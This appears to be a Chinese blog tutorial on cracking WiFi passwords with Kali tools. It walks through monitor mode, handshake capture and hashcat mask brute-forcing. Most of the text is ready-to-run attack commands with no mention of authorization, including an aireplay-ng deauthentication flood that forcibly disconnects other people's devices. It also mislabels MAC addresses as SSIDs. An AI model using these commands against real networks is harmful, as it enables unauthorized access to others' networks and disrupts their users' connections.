hashcat破解wifi密码(kali)

第一步 将网卡处于监听状态

airmon-ng check 
airmon-ng check kill // 关闭影响监听状态的进程
airmon-ng start wlan0 

第二步 扫描可用wifi

airodump-ng wlan0mon

第三部 获取wifi的握手包

airodump-ng -c (上一步扫描的CH) --bssid (想要破解wifi的ssid) -w (握手文件存放目录) wlan0mon

注意:得到wifi的握手包需要有设备连接在该wifi下,原理是将该连接的设备提下线,该设备会重新连接,我们就可以获得该设备连接wifi时所发送的握手包。

将该wifi下的设备强制踢下去

aireplay-ng -0 0 -a (要破解的wifi的ssid) -c (强制踢下的设备的ssid) wlan0mon

当右上角出现WPA handshake ****的时候说明获取成功

第四部 破解密码

  • 使用aircrack-ng 破解,该方法需要字典,效率低并且成功率不高
aircrack-ng -a2 -b (破解wifi的ssid) -w (字典文件) *.cap(以cap后缀文件握手包)
  • 使用hashcat来破解,可以使用字典也可以不使用字典(这里只讲不适用字典的情况)

1 将握手包转换成hccap格式

aircrack-ng *.cap -J wpahashcat

2 进行破解

hashcat -m 2500 -a 3 wpahash.hccap ?d?d?d?d

-m 2500:代表破解WPA/WPA2

-a 3:使用掩码暴力破解

wpahash.hccap: 为上一步转换的hccap文件,若是提示“Old hccap format detected! You need to update”可以将第一步的命令改为

aircrack-ng *.cap -j wpahashcat //生成wpahashcat.hccapx文件

后面的字符:

但如果我们不确定某一位到底是数字还是字母怎么写组合呢?这时候就要用到高级组合:

比如设置 --custom-charset1=?l?d 那么就表示 ?1代表小写字母与数字组合,那么8位随机的数字与小写字母组合可以写成 ?1?1?1?1?1?1?1?1,完整的例子:
hashcat test.txt -a 3 -m 0 
--custom-charset1=?l?d ?1?1?1?1?1?1?1?1
再比如设置 
--custom-charset2=xiao106347 那么就表示 ?2 代表字符串由 x i a o 1 0 6 3 4 7 组成的所有可能组合,完整例子:
hashcat test.txt -a 3 -m 0 
--custom-charset2=xiao106347 ?2?2?2?2?2?2?2?2

注意:1、如果提示“not a native intel openCL runtime“可以直接在后面加上 --force强制运行

          2、如果是使用虚拟机运行可能会出现“Device #1: This device's constant buffer size is too small.
Device #1: This device's local mem size is too small”此时将虚拟机的处理器改为单核处理器

  • 18
    点赞
  • 162
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

步、步、为营

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值